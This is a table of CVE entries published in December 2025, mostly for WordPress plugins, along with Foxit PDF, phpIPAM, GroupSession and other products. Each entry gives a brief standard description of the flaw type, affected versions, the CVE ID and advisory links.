| n/a-Foxit PDF Editor and Reader before 2025.2.1 | Foxit PDF Editor and Reader before 2025.2.1 allow signature spoofing via triggers. An attacker can embed triggers (e.g., JavaScript) in a PDF document that execute during the signing process. When a signer reviews the document, the content appears normal. However, once the signature is applied, the triggers modify content on other pages or optional content layers without explicit warning. This can cause the signed PDF to differ from what the signer saw, undermining the trustworthiness of the digital signature. The fixed versions are 2025.2.1, 14.0.1, and 13.2.1. | 2025-12-11 | not yet calculated | CVE-2025-59803 | https://www.foxit.com/support/security-bulletins.html |
| n/a--phpIPAM v1.7.3 | phpIPAM v1.7.3 contains a Cross-Site Request Forgery (CSRF) vulnerability in the database export functionality. The generate-mysql.php function, located in the /app/admin/import-export/ endpoint, allows remote attackers to trigger large database dump downloads via crafted HTTP GET requests if an administrator has an active session. | 2025-12-08 | not yet calculated | CVE-2025-60912 | https://github.com/phpipam/phpipam https://gist.github.com/amandrei/a8377d9b71c55156d22aaaf485463d15 |
| n/a--GmbH Mitarbeiterportal 2.15.2.0 | A stored Cross Site Scripting (XSS) vulnerability in the bulletin board (SchwarzeBrett) in adata Software GmbH Mitarbeiter Portal 2.15.2.0 allows remote authenticated users to execute arbitrary JavaScript code in the web browser of other users via manipulation of the 'Inhalt' parameter of the '/SchwarzeBrett/Nachrichten/CreateNachricht' or '/SchwarzeBrett/Nachrichten/EditNachricht/' requests. | 2025-12-09 | not yet calculated | CVE-2025-61074 | https://www.adata.de/mitarbeiter-portal/ https://no-sec.net/posts/cve-2025-61074/ |
| n/a--GmbH Mitarbeiterportal 2.15.2.0 | Multiple Incorrect Access Control vulnerabilities in adata Software GmbH Mitarbeiterportal 2.15.2.0 allow remote authenticated, low-privileged users to carry out administrative functions and manipulate data of other users via unauthorized API calls. | 2025-12-09 | not yet calculated | CVE-2025-61075 | https://www.adata.de/mitarbeiter-portal/ https://no-sec.net/posts/cve-2025-61075/ |
| n/a--phpIPAM v1.7.3 | Cross-site scripting (XSS) vulnerability in Request IP form in phpIPAM v1.7.3 allows remote attackers to inject arbitrary web script or HTML via the instructions parameter for the /app/admin/instructions/edit-result.php endpoint. | 2025-12-09 | not yet calculated | CVE-2025-61078 | http://phpipam.com https://glitch0ne.com/2025/12/05/cve-2025-61078-cross-site-scripting-xss-vulnerability-in-request-ip-form-in-phpipam-v1-7-3/ |
| n/a--Outsystems Platform Server 11.18.1.37828 | An issue was discovered in Outsystems Platform Server 11.18.1.37828 allows attackers to cause a denial of service via crafted content-length value mismatching the body length. | 2025-12-09 | not yet calculated | CVE-2025-61258 | https://www.outsystems.com/ https://balwurk.com/ https://balwurk.github.io/CVE-2025-61258/ |
| n/a--Emlog Pro 2.5.20 | Emlog Pro 2.5.20 has an arbitrary file deletion vulnerability. This vulnerability stems from the admin/template.php component and the admin/plugin.php component. They fail to perform path verification and dangerous code filtering for deletion parameters, allowing attackers to exploit this feature for directory traversal. | 2025-12-08 | not yet calculated | CVE-2025-61318 | https://github.com/AndyNull/em/blob/main/emlog%20pro%20-%20del%20vuln.md |
| Japan Total System Co.,Ltd.--GroupSession Free edition | In GroupSession, a Circular notice can be created with its memo field non-editable, but the authorization check is improperly implemented. With some crafted request, a logged-in user may alter the memo field. The affected products and versions are GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. | 2025-12-12 | not yet calculated | CVE-2025-61950 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Japan Total System Co.,Ltd.--GroupSession Free edition | GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. do not validate origins in WebSockets. If a user accesses a crafted page, Chat information sent to the user may be exposed. | 2025-12-12 | not yet calculated | CVE-2025-61987 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Nasir Uddin--Generic Elements | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nasir Uddin Generic Elements generic-elements-for-elementor allows Stored XSS. This issue affects Generic Elements: from n/a through <= 1.2.8. | 2025-12-09 | not yet calculated | CVE-2025-62082 | https://vdp.patchstack.com/database/Wordpress/Plugin/generic-elements-for-elementor/vulnerability/wordpress-generic-elements-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| berthaai--BERTHA AI | Missing Authorization vulnerability in berthaai BERTHA AI bertha-ai-free allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BERTHA AI: from n/a through <= 1.13. | 2025-12-09 | not yet calculated | CVE-2025-62085 | https://vdp.patchstack.com/database/Wordpress/Plugin/bertha-ai-free/vulnerability/wordpress-bertha-ai-plugin-1-13-broken-access-control-vulnerability?_s_id=cve |
| akazanstev-- (Boxberry) | Missing Authorization vulnerability in akazanstev Яндекс Доставка (Boxberry) boxberry allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Яндекс Доставка (Boxberry): from n/a through <= 2.32. | 2025-12-09 | not yet calculated | CVE-2025-62086 | https://vdp.patchstack.com/database/Wordpress/Plugin/boxberry/vulnerability/wordpress-yandeks-dostavka-boxberry-plugin-2-32-broken-access-control-vulnerability?_s_id=cve |
| Jegstudio--Gutenverse News Advanced News Magazine Blog Gutenberg Blocks Addons | Missing Authorization vulnerability in Jegstudio Gutenverse News - Advanced News Magazine Blog Gutenberg Blocks Addons gutenverse-news allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gutenverse News - Advanced News Magazine Blog Gutenberg Blocks Addons: from n/a through <= 3.0.2. | 2025-12-09 | not yet calculated | CVE-2025-62090 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse-news/vulnerability/wordpress-gutenverse-news-advanced-news-magazine-blog-gutenberg-blocks-addons-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve |
| LambertGroup--Image&Video FullScreen Background | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows SQL Injection. This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7. | 2025-12-09 | not yet calculated | CVE-2025-62093 | https://vdp.patchstack.com/database/Wordpress/Plugin/lbg_fullscreen_fullwidth_slider/vulnerability/wordpress-image-video-fullscreen-background-plugin-1-6-7-sql-injection-vulnerability?_s_id=cve |
| themerain--ThemeRain Core | Missing Authorization vulnerability in themerain ThemeRain Core themerain-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ThemeRain Core: from n/a through <= 1.1.9. | 2025-12-09 | not yet calculated | CVE-2025-62100 | https://vdp.patchstack.com/database/Wordpress/Plugin/themerain-core/vulnerability/wordpress-themerain-core-plugin-1-1-9-broken-access-control-vulnerability?_s_id=cve |
| apasionados--DoFollow Case by Case | Cross-Site Request Forgery (CSRF) vulnerability in apasionados DoFollow Case by Case dofollow-case-by-case allows Cross Site Request Forgery. This issue affects DoFollow Case by Case: from n/a through <= 3.5.1. | 2025-12-09 | not yet calculated | CVE-2025-62102 | https://vdp.patchstack.com/database/Wordpress/Plugin/dofollow-case-by-case/vulnerability/wordpress-dofollow-case-by-case-plugin-3-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| wpmediadownload--Media Library File Download | Cross-Site Request Forgery (CSRF) vulnerability in wpmediadownload Media Library File Download media-download allows Cross Site Request Forgery. This issue affects Media Library File Download: from n/a through <= 1.4. | 2025-12-09 | not yet calculated | CVE-2025-62103 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-download/vulnerability/wordpress-media-library-file-download-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| INFINITUM FORM--Geo Controller | Insertion of Sensitive Information Into Sent Data vulnerability in INFINITUM FORM Geo Controller cf-geoplugin allows Retrieve Embedded Sensitive Data. This issue affects Geo Controller: from n/a through <= 8.9.4. | 2025-12-09 | not yet calculated | CVE-2025-62109 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf-geoplugin/vulnerability/wordpress-geo-controller-plugin-8-9-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| Virtuaria--Virtuaria PagBank / PagSeguro para Woocommerce | Missing Authorization vulnerability in Virtuaria Virtuaria PagBank / PagSeguro para Woocommerce virtuaria-pagseguro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Virtuaria PagBank / PagSeguro para Woocommerce: from n/a through <= 3.6.3. | 2025-12-09 | not yet calculated | CVE-2025-62151 | https://vdp.patchstack.com/database/Wordpress/Plugin/virtuaria-pagseguro/vulnerability/wordpress-virtuaria-pagbank-pagseguro-para-woocommerce-plugin-3-6-3-broken-access-control-vulnerability?_s_id=cve |
| ConveyThis--ConveyThis | Missing Authorization vulnerability in ConveyThis ConveyThis conveythis-translate allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ConveyThis: from n/a through <= 268.10. | 2025-12-09 | not yet calculated | CVE-2025-62152 | https://vdp.patchstack.com/database/Wordpress/Plugin/conveythis-translate/vulnerability/wordpress-conveythis-plugin-268-10-broken-access-control-vulnerability?_s_id=cve |
| Graham--Quick Interest Slider | Missing Authorization vulnerability in Graham Quick Interest Slider quick-interest-slider allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quick Interest Slider: from n/a through <= 3.1.5. | 2025-12-09 | not yet calculated | CVE-2025-62153 | https://vdp.patchstack.com/database/Wordpress/Plugin/quick-interest-slider/vulnerability/wordpress-quick-interest-slider-plugin-3-1-5-broken-access-control-vulnerability?_s_id=cve |
| Japan Total System Co.,Ltd.--GroupSession Free edition | SQL Injection vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If exploited, information stored in the database may be obtained or altered by an authenticated user. | 2025-12-12 | not yet calculated | CVE-2025-62192 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| ProteusThemes--Custom Sidebars by ProteusThemes | Cross-Site Request Forgery (CSRF) vulnerability in ProteusThemes Custom Sidebars by ProteusThemes custom-sidebars-by-proteusthemes allows Cross Site Request Forgery. This issue affects Custom Sidebars by ProteusThemes: from n/a through <= 1.0.3. | 2025-12-09 | not yet calculated | CVE-2025-62733 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-sidebars-by-proteusthemes/vulnerability/wordpress-custom-sidebars-by-proteusthemes-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Michael Revellin-Clerc--Media Library Downloader | Cross-Site Request Forgery (CSRF) vulnerability in Michael Revellin-Clerc Media Library Downloader media-library-downloader allows Cross Site Request Forgery. This issue affects Media Library Downloader: from n/a through <= 1.4.0. | 2025-12-09 | not yet calculated | CVE-2025-62734 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-library-downloader/vulnerability/wordpress-media-library-downloader-plugin-1-4-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Joel--User Spam Remover | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Joel User Spam Remover user-spam-remover allows Retrieve Embedded Sensitive Data. This issue affects User Spam Remover: from n/a through <= 1.1. | 2025-12-09 | not yet calculated | CVE-2025-62735 | https://vdp.patchstack.com/database/Wordpress/Plugin/user-spam-remover/vulnerability/wordpress-user-spam-remover-plugin-1-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| opicron--Image Cleanup | Missing Authorization vulnerability in opicron Image Cleanup image-cleanup allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Cleanup: from n/a through <= 1.9.2. | 2025-12-09 | not yet calculated | CVE-2025-62736 | https://vdp.patchstack.com/database/Wordpress/Plugin/image-cleanup/vulnerability/wordpress-image-cleanup-plugin-1-9-2-broken-access-control-vulnerability?_s_id=cve |
| opicron--Image Cleanup | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in opicron Image Cleanup image-cleanup allows Retrieve Embedded Sensitive Data. This issue affects Image Cleanup: from n/a through <= 1.9.2. | 2025-12-09 | not yet calculated | CVE-2025-62737 | https://vdp.patchstack.com/database/Wordpress/Plugin/image-cleanup/vulnerability/wordpress-image-cleanup-plugin-1-9-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| mmattax--Formstack Online Forms | Missing Authorization vulnerability in mmattax Formstack Online Forms formstack allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Formstack Online Forms: from n/a through <= 2.0.2. | 2025-12-09 | not yet calculated | CVE-2025-62738 | https://vdp.patchstack.com/database/Wordpress/Plugin/formstack/vulnerability/wordpress-formstack-online-forms-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve |
| SaifuMak--Add Custom Codes | Cross-Site Request Forgery (CSRF) vulnerability in SaifuMak Add Custom Codes add-custom-codes allows Cross Site Request Forgery. This issue affects Add Custom Codes: from n/a through <= 4.80. | 2025-12-09 | not yet calculated | CVE-2025-62739 | https://vdp.patchstack.com/database/Wordpress/Plugin/add-custom-codes/vulnerability/wordpress-add-custom-codes-plugin-4-80-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mario Peshev--WP-CRM System | Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP-CRM System: from n/a through <= 3.4.5. | 2025-12-09 | not yet calculated | CVE-2025-62740 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-crm-system/vulnerability/wordpress-wp-crm-system-plugin-3-4-5-broken-access-control-vulnerability?_s_id=cve |
| photoboxone--SMTP Mail | Cross-Site Request Forgery (CSRF) vulnerability in photoboxone SMTP Mail smtp-mail allows Cross Site Request Forgery. This issue affects SMTP Mail: from n/a through <= 1.3.47. | 2025-12-09 | not yet calculated | CVE-2025-62762 | https://vdp.patchstack.com/database/Wordpress/Plugin/smtp-mail/vulnerability/wordpress-smtp-mail-plugin-1-3-47-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Evan Herman--Post Cloner | Missing Authorization vulnerability in Evan Herman Post Cloner post-cloner allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post Cloner: from n/a through <= 1.0.0. | 2025-12-09 | not yet calculated | CVE-2025-62865 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-cloner/vulnerability/wordpress-post-cloner-plugin-1-0-0-broken-access-control-vulnerability?_s_id=cve |
| Valerio Monti--Auto Alt Text | Cross-Site Request Forgery (CSRF) vulnerability in Valerio Monti Auto Alt Text auto-alt-text allows Cross Site Request Forgery. This issue affects Auto Alt Text: from n/a through <= 2.5.2. | 2025-12-09 | not yet calculated | CVE-2025-62866 | https://vdp.patchstack.com/database/Wordpress/Plugin/auto-alt-text/vulnerability/wordpress-auto-alt-text-plugin-2-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ergonet--Ergonet Cache | Missing Authorization vulnerability in ergonet Ergonet Cache ergonet-varnish-cache allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ergonet Cache: from n/a through <= 1.0.11. | 2025-12-09 | not yet calculated | CVE-2025-62867 | https://vdp.patchstack.com/database/Wordpress/Plugin/ergonet-varnish-cache/vulnerability/wordpress-ergonet-cache-plugin-1-0-11-broken-access-control-vulnerability?_s_id=cve |
| Gravitec.net - Web Push Notifications--Gravitec.net – Web Push Notifications | Missing Authorization vulnerability in Gravitec.net - Web Push Notifications Gravitec.net – Web Push Notifications gravitec-net-web-push-notifications allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gravitec.net – Web Push Notifications: from n/a through <= 2.9.17. | 2025-12-09 | not yet calculated | CVE-2025-62869 | https://vdp.patchstack.com/database/Wordpress/Plugin/gravitec-net-web-push-notifications/vulnerability/wordpress-gravitec-net-web-push-notifications-plugin-2-9-17-broken-access-control-vulnerability?_s_id=cve |
| Eupago--Eupago Gateway For Woocommerce | Missing Authorization vulnerability in Eupago Eupago Gateway For Woocommerce eupago-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Eupago Gateway For Woocommerce: from n/a through <= 4.6.3. | 2025-12-09 | not yet calculated | CVE-2025-62870 | https://vdp.patchstack.com/database/Wordpress/Plugin/eupago-gateway-for-woocommerce/vulnerability/wordpress-eupago-gateway-for-woocommerce-plugin-4-6-3-broken-access-control-vulnerability?_s_id=cve |
| Alex Prokopenko / JustCoded--Just TinyMCE Custom Styles | Cross-Site Request Forgery (CSRF) vulnerability in Alex Prokopenko / JustCoded Just TinyMCE Custom Styles just-tinymce-styles allows Cross Site Request Forgery. This issue affects Just TinyMCE Custom Styles: from n/a through <= 1.2.1. | 2025-12-09 | not yet calculated | CVE-2025-62871 | https://vdp.patchstack.com/database/Wordpress/Plugin/just-tinymce-styles/vulnerability/wordpress-just-tinymce-custom-styles-plugin-1-2-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| JK--Social Photo Fetcher | Cross-Site Request Forgery (CSRF) vulnerability in JK Social Photo Fetcher facebook-photo-fetcher allows Cross Site Request Forgery. This issue affects Social Photo Fetcher: from n/a through <= 3.0.4. | 2025-12-09 | not yet calculated | CVE-2025-62872 | https://vdp.patchstack.com/database/Wordpress/Plugin/facebook-photo-fetcher/vulnerability/wordpress-social-photo-fetcher-plugin-3-0-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Flashyapp--WP Flashy Marketing Automation | Cross-Site Request Forgery (CSRF) vulnerability in Flashyapp WP Flashy Marketing Automation wp-flashy-marketing-automation allows Cross Site Request Forgery. This issue affects WP Flashy Marketing Automation: from n/a through <= 2.0.8. | 2025-12-09 | not yet calculated | CVE-2025-62873 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-flashy-marketing-automation/vulnerability/wordpress-wp-flashy-marketing-automation-plugin-2-0-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| rainafarai--Notification for Telegram | Missing Authorization vulnerability in rainafarai Notification for Telegram notification-for-telegram allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Notification for Telegram: from n/a through <= 3.4.7. | 2025-12-09 | not yet calculated | CVE-2025-62993 | https://vdp.patchstack.com/database/Wordpress/Plugin/notification-for-telegram/vulnerability/wordpress-notification-for-telegram-plugin-3-4-7-broken-access-control-vulnerability?_s_id=cve |
| WP Messiah--WP AI CoPilot | Insertion of Sensitive Information Into Sent Data vulnerability in WP Messiah WP AI CoPilot ai-co-pilot-for-wp allows Retrieve Embedded Sensitive Data. This issue affects WP AI CoPilot: from n/a through <= 1.2.7. | 2025-12-09 | not yet calculated | CVE-2025-62994 | https://vdp.patchstack.com/database/Wordpress/Plugin/ai-co-pilot-for-wp/vulnerability/wordpress-wp-ai-copilot-plugin-1-2-7-sensitive-data-exposure-vulnerability-2?_s_id=cve |
| multiparcels--MultiParcels Shipping For WooCommerce | Missing Authorization vulnerability in multiparcels MultiParcels Shipping For WooCommerce multiparcels-shipping-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MultiParcels Shipping For WooCommerce: from n/a through <= 1.30.12. | 2025-12-09 | not yet calculated | CVE-2025-62995 | https://vdp.patchstack.com/database/Wordpress/Plugin/multiparcels-shipping-for-woocommerce/vulnerability/wordpress-multiparcels-shipping-for-woocommerce-plugin-1-30-12-broken-access-control-vulnerability?_s_id=cve |
| Code Amp--Custom Layouts Post + Product grids made easy | Missing Authorization vulnerability in Code Amp Custom Layouts - Post + Product grids made easy custom-layouts allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Custom Layouts - Post + Product grids made easy: from n/a through <= 1.4.12. | 2025-12-09 | not yet calculated | CVE-2025-62996 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-layouts/vulnerability/wordpress-custom-layouts-post-product-grids-made-easy-plugin-1-4-12-broken-access-control-vulnerability?_s_id=cve |
| levelfourdevelopment--WP EasyCart | Insertion of Sensitive Information Into Sent Data vulnerability in levelfourdevelopment WP EasyCart wp-easycart allows Retrieve Embedded Sensitive Data. This issue affects WP EasyCart: from n/a through <= 5.8.11. | 2025-12-09 | not yet calculated | CVE-2025-62997 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-easycart/vulnerability/wordpress-wp-easycart-plugin-5-8-11-sensitive-data-exposure-vulnerability?_s_id=cve |
| themezaa--Litho Addons | Missing Authorization vulnerability in themezaa Litho Addons litho-addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Litho Addons: from n/a through <= 3.4. | 2025-12-09 | not yet calculated | CVE-2025-62999 | https://vdp.patchstack.com/database/Wordpress/Plugin/litho-addons/vulnerability/wordpress-litho-addons-plugin-3-4-broken-access-control-vulnerability?_s_id=cve |
| fuelthemes--North - Required Plugin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes North - Required Plugin north-plugin allows PHP Local File Inclusion. This issue affects North - Required Plugin: from n/a through <= 1.4.2. | 2025-12-09 | not yet calculated | CVE-2025-63003 | https://vdp.patchstack.com/database/Wordpress/Plugin/north-plugin/vulnerability/wordpress-north-required-plugin-plugin-1-4-2-local-file-inclusion-vulnerability?_s_id=cve |
| Metagauss--EventPrime | Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EventPrime: from n/a through <= 4.2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-63006 | https://vdp.patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| Metagauss--EventPrime | Insertion of Sensitive Information Into Sent Data vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Retrieve Embedded Sensitive Data. This issue affects EventPrime: from n/a through <= 4.2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-63007 | https://vdp.patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-4-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| weDevs--WP ERP | Missing Authorization vulnerability in weDevs WP ERP erp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP ERP: from n/a through <= 1.16.7. | 2025-12-09 | not yet calculated | CVE-2025-63008 | https://vdp.patchstack.com/database/Wordpress/Plugin/erp/vulnerability/wordpress-wp-erp-plugin-1-16-7-broken-access-control-vulnerability?_s_id=cve |
| yuvalo--WP Google Analytics Events | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in yuvalo WP Google Analytics Events wp-google-analytics-events allows Retrieve Embedded Sensitive Data. This issue affects WP Google Analytics Events: from n/a through <= 2.8.2. | 2025-12-09 | not yet calculated | CVE-2025-63009 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-google-analytics-events/vulnerability/wordpress-wp-google-analytics-events-plugin-2-8-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| ThemesInflow--Hercules Core | Server-Side Request Forgery (SSRF) vulnerability in ThemesInflow Hercules Core hercules-core allows Server Side Request Forgery. This issue affects Hercules Core : from n/a through <= 7.4. | 2025-12-09 | not yet calculated | CVE-2025-63010 | https://vdp.patchstack.com/database/Wordpress/Plugin/hercules-core/vulnerability/wordpress-hercules-core-plugin-7-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ThimPress--WP Hotel Booking | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows DOM-Based XSS. This issue affects WP Hotel Booking: from n/a through <= 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-63011 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-hotel-booking/vulnerability/wordpress-wp-hotel-booking-plugin-2-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThimPress--WP Hotel Booking | Cross-Site Request Forgery (CSRF) vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows Cross Site Request Forgery. This issue affects WP Hotel Booking: from n/a through <= 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-63012 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-hotel-booking/vulnerability/wordpress-wp-hotel-booking-plugin-2-2-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThimPress--WP Hotel Booking | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows Retrieve Embedded Sensitive Data. This issue affects WP Hotel Booking: from n/a through <= 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-63013 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-hotel-booking/vulnerability/wordpress-wp-hotel-booking-plugin-2-2-7-sensitive-data-exposure-vulnerability?_s_id=cve |
| paysera--WooCommerce Payment Gateway – Paysera | Missing Authorization vulnerability in paysera WooCommerce Payment Gateway – Paysera woo-payment-gateway-paysera allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WooCommerce Payment Gateway – Paysera: from n/a through <= 3.9.0. | 2025-12-09 | not yet calculated | CVE-2025-63015 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-payment-gateway-paysera/vulnerability/wordpress-woocommerce-payment-gateway-paysera-plugin-3-9-0-broken-access-control-vulnerability?_s_id=cve |
| Easy Payment--Payment Gateway for PayPal on WooCommerce | Missing Authorization vulnerability in Easy Payment Payment Gateway for PayPal on WooCommerce woo-paypal-gateway allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway for PayPal on WooCommerce: from n/a through <= 9.0.52. | 2025-12-09 | not yet calculated | CVE-2025-63023 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-paypal-gateway/vulnerability/wordpress-payment-gateway-for-paypal-on-woocommerce-plugin-9-0-52-broken-access-control-vulnerability?_s_id=cve |
| tychesoftwares--Order Delivery Date for WooCommerce | Missing Authorization vulnerability in tychesoftwares Order Delivery Date for WooCommerce order-delivery-date-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Order Delivery Date for WooCommerce: from n/a through <= 4.3.1. | 2025-12-09 | not yet calculated | CVE-2025-63024 | https://vdp.patchstack.com/database/Wordpress/Plugin/order-delivery-date-for-woocommerce/vulnerability/wordpress-order-delivery-date-for-woocommerce-plugin-4-3-1-broken-access-control-vulnerability?_s_id=cve |
| Xagio SEO--Xagio SEO | Missing Authorization vulnerability in Xagio SEO Xagio SEO xagio-seo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Xagio SEO: from n/a through <= 7.1.0.29. | 2025-12-09 | not yet calculated | CVE-2025-63025 | https://vdp.patchstack.com/database/Wordpress/Plugin/xagio-seo/vulnerability/wordpress-xagio-seo-plugin-7-1-0-29-broken-access-control-vulnerability?_s_id=cve |
| shinetheme--Traveler | Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Traveler: from n/a through <= 3.2.6. | 2025-12-09 | not yet calculated | CVE-2025-63028 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--New User Approve | Cross-Site Request Forgery (CSRF) vulnerability in Saad Iqbal New User Approve new-user-approve allows Cross Site Request Forgery. This issue affects New User Approve: from n/a through <= 3.2.0. | 2025-12-09 | not yet calculated | CVE-2025-63030 | https://vdp.patchstack.com/database/Wordpress/Plugin/new-user-approve/vulnerability/wordpress-new-user-approve-plugin-3-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Riyadh Ahmed--Make Section & Column Clickable For Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Riyadh Ahmed Make Section & Column Clickable For Elementor make-section-column-clickable-elementor allows Stored XSS. This issue affects Make Section & Column Clickable For Elementor: from n/a through <= 2.3. | 2025-12-09 | not yet calculated | CVE-2025-63033 | https://vdp.patchstack.com/database/Wordpress/Plugin/make-section-column-clickable-elementor/vulnerability/wordpress-make-section-column-clickable-for-elementor-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Steve Truman--Page View Count | Missing Authorization vulnerability in Steve Truman Page View Count page-views-count allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Page View Count: from n/a through <= 2.8.7. | 2025-12-09 | not yet calculated | CVE-2025-63034 | https://vdp.patchstack.com/database/Wordpress/Plugin/page-views-count/vulnerability/wordpress-page-view-count-plugin-2-8-7-settings-change-vulnerability?_s_id=cve |
| VibeThemes--WPLMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VibeThemes WPLMS wplms_plugin allows DOM-Based XSS. This issue affects WPLMS: from n/a through <= 1.9.9.5.4. | 2025-12-09 | not yet calculated | CVE-2025-63035 | https://vdp.patchstack.com/database/Wordpress/Plugin/wplms_plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| DFDevelopment--Ronneby Theme Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DFDevelopment Ronneby Theme Core ronneby-core allows PHP Local File Inclusion. This issue affects Ronneby Theme Core: from n/a through <= 1.5.68. | 2025-12-09 | not yet calculated | CVE-2025-63036 | https://vdp.patchstack.com/database/Wordpress/Plugin/ronneby-core/vulnerability/wordpress-ronneby-theme-core-plugin-1-5-68-local-file-inclusion-vulnerability?_s_id=cve |
